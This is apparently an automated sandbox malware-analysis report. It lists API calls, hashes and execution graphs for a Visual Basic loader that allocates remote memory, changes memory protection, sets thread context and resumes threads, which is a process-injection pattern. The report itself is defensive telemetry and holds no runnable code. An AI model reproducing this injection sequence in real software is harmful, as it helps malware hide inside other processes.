                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow
                                                                                                            • String ID: Notification Area$Shell_TrayWnd
                                                                                                            • API String ID: 530164218-3088717331
                                                                                                            • Opcode ID: 962655374bfe0fd2270228ccbb9a9f6d9dc5202d0d3684cbb2ebc3ce710e3d1b
                                                                                                            • Instruction ID: ccd840bf168f683265c4c7987bc031e941a4d47c96c924e1ca8cf3b60f4d795a
                                                                                                            • Opcode Fuzzy Hash: 962655374bfe0fd2270228ccbb9a9f6d9dc5202d0d3684cbb2ebc3ce710e3d1b
                                                                                                            • Instruction Fuzzy Hash: 9F011E34A0434DAFDB04EBA8E85199DBBF9BF8D300F5144A6E814A7260E730BB049795
                                                                                                            APIs
                                                                                                            • FindWindowExW.USER32(?,00000000,Snake List,00000000), ref: 035E7A70
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindWindow
                                                                                                            • String ID: Snake List$bosa_sdm_
                                                                                                            • API String ID: 134000473-4107077030
                                                                                                            • Opcode ID: 07a25a469f695de909e229d57cc20ec9e31f5e9f5068a9cfdd9b361db21e9458
                                                                                                            • Instruction ID: cc7f0f4193480b679bfb23e57344442030defdb92bbde85f6de52fed017750b0
                                                                                                            • Opcode Fuzzy Hash: 07a25a469f695de909e229d57cc20ec9e31f5e9f5068a9cfdd9b361db21e9458
                                                                                                            • Instruction Fuzzy Hash: FFF06234B04749AFDB15DBA8EC61B5DBBF8FB8C700FA144E1FD10962A1E6726B108754
                                                                                                            APIs
                                                                                                            • FindWindowExW.USER32(?,00000000,TFolderTreeView,00000000), ref: 035E7BFE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindWindow
                                                                                                            • String ID: TFolderTreeView$TSelectFolderForm
                                                                                                            • API String ID: 134000473-2863556216
                                                                                                            • Opcode ID: 5cc21f0014c8c7c64e2cea96d43b72091c193402876f2d16fe8c61774e074a98
                                                                                                            • Instruction ID: cd84189c1490ae1442c5f315324834a8459c5ebf84c04432e5946dd3cef4cd5c
                                                                                                            • Opcode Fuzzy Hash: 5cc21f0014c8c7c64e2cea96d43b72091c193402876f2d16fe8c61774e074a98
                                                                                                            • Instruction Fuzzy Hash: A9F06234B04348AFDB15DBA8ED51B4DBBFCFB8D600F5144E1F804A66A1E6306A008654
                                                                                                            APIs
                                                                                                            • FindWindowExW.USER32(?,00000000,SHBrowseForFolder ShellNameSpace Control,00000000), ref: 035E7B1A
                                                                                                            Strings
                                                                                                            • #32770, xrefs: 035E7B01
                                                                                                            • SHBrowseForFolder ShellNameSpace Control, xrefs: 035E7B0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindWindow
                                                                                                            • String ID: #32770$SHBrowseForFolder ShellNameSpace Control
                                                                                                            • API String ID: 134000473-4023719415
                                                                                                            • Opcode ID: cfea249a36f04524a499515f829f5241a16be0e281ea1f885e72a31305f6b344
                                                                                                            • Instruction ID: 4adff57d0c7b744b2a118ea92f982d8e8e82645fc4280a7e8df830ee3731bcd2
                                                                                                            • Opcode Fuzzy Hash: cfea249a36f04524a499515f829f5241a16be0e281ea1f885e72a31305f6b344
                                                                                                            • Instruction Fuzzy Hash: CBF09634B04388AFDB05DBA8EC61B4DBBFCFB8C700F5144E1F80097660F6706A009654
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,035F0493,00000000,035F04CA), ref: 0356D222
                                                                                                              • Part of subcall function 0355C13C: GetProcAddress.KERNEL32(?,?), ref: 0355C160
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                            • API String ID: 1646373207-1127948838
                                                                                                            • Opcode ID: 845a0f23cd805e95c3e39318e1f8b796e75e6a74987940a36b0b3783c268b6b0
                                                                                                            • Instruction ID: 191e649e5c381a770cd010b960578a671231b305ead5c09b4a69bbfae9fa2e14
                                                                                                            • Opcode Fuzzy Hash: 845a0f23cd805e95c3e39318e1f8b796e75e6a74987940a36b0b3783c268b6b0
                                                                                                            • Instruction Fuzzy Hash: 9DD05EBC7407468FDB20EBB2B890E0526F8F380208B00082666028B135C6B0D4099F01

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:12%
                                                                                                            Dynamic/Decrypted Code Coverage:94.3%
                                                                                                            Signature Coverage:28.4%
                                                                                                            Total number of Nodes:141
                                                                                                            Total number of Limit Nodes:5
                                                                                                            execution_graph 1594 401384 #100 1595 4013a6 1594->1595 1596 7a013f 1597 7a1180 GetPEB 1596->1597 1598 7a0145 SetErrorMode SetErrorMode 1597->1598 1599 7a02a0 1598->1599 1601 7a0169 1598->1601 1604 7a02ad 1599->1604 1603 7a295b 1601->1603 1608 7a0443 1601->1608 1605 7a2944 1604->1605 1606 7a0443 GetPEB 1605->1606 1607 7a295b 1605->1607 1606->1607 1609 7a1180 GetPEB 1608->1609 1610 7a0449 1609->1610 1666 7a0432 1667 7a1180 GetPEB 1666->1667 1668 7a0438 1667->1668 1669 7a0443 GetPEB 1668->1669 1670 7a295b 1669->1670 1671 7a1636 1672 7a1180 GetPEB 1671->1672 1673 7a163c 1672->1673 1674 7a1b3c TerminateProcess 1673->1674 1675 7a1b46 1673->1675 1676 7a1ab8 GetPEB 1675->1676 1677 7a2fc8 1676->1677 1678 7a2936 1679 7a2939 1678->1679 1680 7a0443 GetPEB 1679->1680 1681 7a295b 1679->1681 1680->1681 1628 7a0fb7 GetPEB 1641 7a1162 NtProtectVirtualMemory 1628->1641 1630 7a10a4 1631 7a10a7 1636 7a1110 1631->1636 1637 7a10c9 1631->1637 1632 7a0fec 1632->1630 1632->1631 1634 7a1015 1632->1634 1642 7a1162 NtProtectVirtualMemory 1634->1642 1635 7a115f 1644 7a1162 NtProtectVirtualMemory 1636->1644 1643 7a1162 NtProtectVirtualMemory 1637->1643 1640 7a110d 1641->1632 1642->1630 1643->1640 1644->1635 1564 7a1b28 1565 7a1b39 TerminateProcess 1564->1565 1567 47c814 11 API calls 1568 47c95b 1567->1568 1691 7a05ed 1692 7a1180 GetPEB 1691->1692 1693 7a05f3 1692->1693 1698 7a0fb7 GetPEB 1693->1698 1695 7a0604 1711 7a11fc GetPEB 1695->1711 1697 7a0609 1713 7a1162 NtProtectVirtualMemory 1698->1713 1700 7a10a4 1700->1695 1701 7a10a7 1706 7a1110 1701->1706 1707 7a10c9 1701->1707 1702 7a0fec 1702->1700 1702->1701 1704 7a1015 1702->1704 1714 7a1162 NtProtectVirtualMemory 1704->1714 1705 7a115f 1705->1695 1716 7a1162 NtProtectVirtualMemory 1706->1716 1715 7a1162 NtProtectVirtualMemory 1707->1715 1710 7a110d 1710->1695 1712 7a121c 1711->1712 1712->1697 1713->1702 1714->1700 1715->1710 1716->1705 1651 7a1666 1653 7a1746 1651->1653 1652 7a1b3c TerminateProcess 1653->1652 1654 7a1b46 1653->1654 1657 7a1ab8 1654->1657 1656 7a2fc8 1658 7a1180 GetPEB 1657->1658 1659 7a1abe 1658->1659 1659->1656 1549 7a141b 1553 7a1180 GetPEB 1549->1553 1552 7a1435 1554 7a118c NtSetContextThread 1553->1554 1554->1552 1733 7a2298 1734 7a1180 GetPEB 1733->1734 1735 7a229e 1734->1735 1569 47a0a4 66 API calls 1570 47a4f3 __vbaVarMove 1569->1570 1572 47a5d2 1570->1572 1573 47a7c5 __vbaSetSystemError 1572->1573 1592 402040 1573->1592 1593 402049 1592->1593 1611 7a231f 1612 7a2439 VirtualAllocEx 1611->1612 1613 7a242d 1611->1613 1614 7a3279 1612->1614 1613->1612 1617 7a2460 GetPEB 1614->1617 1616 7a327e 1618 7a2471 1617->1618 1618->1616 1660 47c96b 13 API calls 1661 47ca77 9 API calls 1660->1661 1662 7a0757 1664 7a075e 1662->1664 1663 7a1b3c TerminateProcess 1664->1663 1665 7a320c 1664->1665 1723 7a17cb 1725 7a177f 1723->1725 1724 7a1b3c TerminateProcess 1725->1724 1726 7a1b46 1725->1726 1727 7a1ab8 GetPEB 1726->1727 1728 7a2fc8 1727->1728 1555 7a1448 NtResumeThread 1556 7a1551 Sleep 1555->1556 1558 7a1b61 1555->1558 1557 7a1565 1556->1557 1559 7a1592 1556->1559 1559->1558 1561 7a056f 1559->1561 1562 7a1180 GetPEB 1561->1562 1563 7a0575 1562->1563 1729 7a0dc8 1730 7a0dec 1729->1730 1731 7a0fb7 2 API calls 1730->1731 1732 7a0e5d 1731->1732 1736 4011b2 __vbaExceptHandler 1737 7a1588 1738 7a1180 GetPEB 1737->1738 1739 7a158e 1738->1739 1740 7a056f GetPEB 1739->1740 1741 7a2b05 1739->1741 1740->1741 1619 7a018f 1620 7a1180 GetPEB 1619->1620 1621 7a0283 1620->1621 1622 7a0289 VirtualAllocEx 1621->1622 1622->1622 1623 7a02a0 1622->1623 1624 7a02ad GetPEB 1623->1624 1625 7a2807 1624->1625 1626 7a0443 GetPEB 1625->1626 1627 7a295b 1625->1627 1626->1627 1682 7a1c01 1683 7a1c07 1682->1683 1686 7a1d37 1683->1686 1687 7a1d43 1686->1687 1690 7a11ef GetPEB 1687->1690 1689 7a1d55 1690->1689

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 256 7a1448-7a154b NtResumeThread 257 7a1b61-7a2a91 call 7a143d 256->257 258 7a1551-7a1563 Sleep 256->258 270 7a2a93 257->270 271 7a2ae5-7a2afa 257->271 259 7a1592-7a2b03 call 7a159a 258->259 260 7a1565-7a1568 258->260 275 7a2b48-7a2c32 259->275 276 7a2b05-7a2b09 259->276 261 7a2c2a 260->261 261->261 273 7a2b0b-7a2b2e call 7a0583 270->273 274 7a2a96-7a2aa1 270->274 271->273 292 7a2c9b-7a2d5a 275->292 293 7a2c34-7a2c59 call 7a056f 275->293 276->273 293->292
                                                                                                            APIs
                                                                                                            • NtResumeThread.NTDLL(?,00000000), ref: 007A1546
                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 007A1556
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeSleepThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1530989685-0
                                                                                                            • Opcode ID: 62dcd23f7042007decc734f2bb8c01832dea69bd06e8bcf8c2e68598dd1ccbad
                                                                                                            • Instruction ID: bd5443a4559f7fed71c9a852722585896df3ac5580eee66a4728a4657ed91971
                                                                                                            • Opcode Fuzzy Hash: 62dcd23f7042007decc734f2bb8c01832dea69bd06e8bcf8c2e68598dd1ccbad
                                                                                                            • Instruction Fuzzy Hash: DCD05E30540007EBE715AB60C989BB9F722BFC6700F448B60E16A49091D735AD90DF92

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 345 7a141b-7a142f call 7a1180 NtSetContextThread 348 7a1b61-7a1b6b 345->348 349 7a1435-7a1438 345->349 350 7a2a8b-7a2a91 call 7a143d 348->350 349->350 354 7a2a93 350->354 355 7a2ae5-7a2afa 350->355 356 7a2b0b-7a2b2e call 7a0583 354->356 357 7a2a96-7a2aa1 354->357 355->356
                                                                                                            APIs
                                                                                                            • NtSetContextThread.NTDLL(?,?), ref: 007A142A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1591575202-0
                                                                                                            • Opcode ID: 192f66f9a1f54bf73833eec1adcf7babb407acbd44efd78573a2e8dfd83b320e
                                                                                                            • Instruction ID: 6d24c546ceaacee5c7cbd8b58231fc89bef58c8acdd1f7ec00d5fa478f5beb8f
                                                                                                            • Opcode Fuzzy Hash: 192f66f9a1f54bf73833eec1adcf7babb407acbd44efd78573a2e8dfd83b320e
                                                                                                            • Instruction Fuzzy Hash: 990145B5100542F7CA126F18C946E99B723FBD3781F648F10E41214523FB289C53ABB8

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 397 7a1162-7a117d NtProtectVirtualMemory
                                                                                                            APIs
                                                                                                            • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,007A0FEC,00000040,007A0604,00000000,00000000,00000000,00000000,00000000), ref: 007A117B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706961497-0
                                                                                                            • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                            • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                                                                                            • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                            • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 403 7a1180-7a1189 GetPEB 404 7a118c-7a1197 403->404 404->404 405 7a1199-7a11a0 404->405 405->404 406 7a11a2-7a11b8 405->406 407 7a11bb-7a11be 406->407 407->407 408 7a11c0-7a11c9 407->408 408->407 410 7a11cb-7a11cc 408->410 411 7a11ce-7a11d1 410->411 412 7a11d2 410->412 411->412 412->407 413 7a11d4-7a11ee 412->413
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0234486e718de8fff341597eb8db90d4ab84f649a936077630535bbb9103ba92
                                                                                                            • Instruction ID: 1bb7ac543bbe846d7a8ac7755fdb1a741b1ee71f1df59aae87ea804b073dd816
                                                                                                            • Opcode Fuzzy Hash: 0234486e718de8fff341597eb8db90d4ab84f649a936077630535bbb9103ba92
                                                                                                            • Instruction Fuzzy Hash: 0E016276941214DFE720CF48CDC0E55B7F8FB4A760F858699EA449B711C378EC40CA66

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • __vbaChkstk.MSVBVM60(?,004011C6), ref: 0047A0C1
                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A0DE
                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004028E8,00000011,?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A0EE
                                                                                                            • __vbaStrCat.MSVBVM60(0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A0FD
                                                                                                            • __vbaStrMove.MSVBVM60(0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A10A
                                                                                                            • __vbaStrCat.MSVBVM60(003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A115
                                                                                                            • __vbaStrMove.MSVBVM60(003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011,?,?,?,?,004011C6), ref: 0047A122
                                                                                                            • __vbaStrCat.MSVBVM60(00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A12D
                                                                                                            • __vbaStrMove.MSVBVM60(00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A13A
                                                                                                            • __vbaStrCat.MSVBVM60(0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A145
                                                                                                            • __vbaStrMove.MSVBVM60(0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A152
                                                                                                            • __vbaStrCat.MSVBVM60(07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A15D
                                                                                                            • __vbaStrMove.MSVBVM60(07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?,004028E8,00000011), ref: 0047A16A
                                                                                                            • __vbaStrCat.MSVBVM60(07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?), ref: 0047A175
                                                                                                            • __vbaStrMove.MSVBVM60(07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8,00000011,?), ref: 0047A182
                                                                                                            • __vbaStrCat.MSVBVM60(0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8), ref: 0047A18D
                                                                                                            • __vbaStrMove.MSVBVM60(0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000,?,004028E8), ref: 0047A19A
                                                                                                            • __vbaStrCat.MSVBVM60(1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000), ref: 0047A1A5
                                                                                                            • __vbaStrMove.MSVBVM60(1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000,0003C000,00000000), ref: 0047A1B2
                                                                                                            • __vbaStrCat.MSVBVM60(1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000), ref: 0047A1BD
                                                                                                            • __vbaStrMove.MSVBVM60(1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000,003F0000,00000000), ref: 0047A1CA
                                                                                                            • __vbaStrCat.MSVBVM60(3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000), ref: 0047A1D5
                                                                                                            • __vbaStrMove.MSVBVM60(3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000,00FE0000,00000000), ref: 0047A1E2
                                                                                                            • __vbaStrCat.MSVBVM60(3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000), ref: 0047A1ED
                                                                                                            • __vbaStrMove.MSVBVM60(3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000,0EFC0000,00000000), ref: 0047A1FA
                                                                                                            • __vbaStrCat.MSVBVM60(3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000), ref: 0047A205
                                                                                                            • __vbaStrMove.MSVBVM60(3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000,07F80000,00000000), ref: 0047A212
                                                                                                            • __vbaStrCat.MSVBVM60(7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000), ref: 0047A21D
                                                                                                            • __vbaStrMove.MSVBVM60(7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000,07F80000,00000000), ref: 0047A22A
                                                                                                            • __vbaStrCat.MSVBVM60(7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000), ref: 0047A235
                                                                                                            • __vbaStrMove.MSVBVM60(7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000,0FF00000,00000000), ref: 0047A242
                                                                                                            • __vbaStrCat.MSVBVM60(7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000), ref: 0047A24D
                                                                                                            • __vbaStrMove.MSVBVM60(7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000,1FF00000,00000000), ref: 0047A25A
                                                                                                            • __vbaStrCat.MSVBVM60(7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000), ref: 0047A265
                                                                                                            • __vbaStrMove.MSVBVM60(7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000,1FE00000,00000000), ref: 0047A272
                                                                                                            • __vbaStrCat.MSVBVM60(7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000), ref: 0047A27D
                                                                                                            • __vbaStrMove.MSVBVM60(7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000,3FE00000,00000000), ref: 0047A28A
                                                                                                            • __vbaStrCat.MSVBVM60(7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000), ref: 0047A295
                                                                                                            • __vbaStrMove.MSVBVM60(7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000,3FE00000,00000000), ref: 0047A2A2
                                                                                                            • __vbaStrCat.MSVBVM60(3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000), ref: 0047A2AD
                                                                                                            • __vbaStrMove.MSVBVM60(3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000,3FF00000,00000000), ref: 0047A2BA
                                                                                                            • __vbaStrCat.MSVBVM60(3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000), ref: 0047A2C5
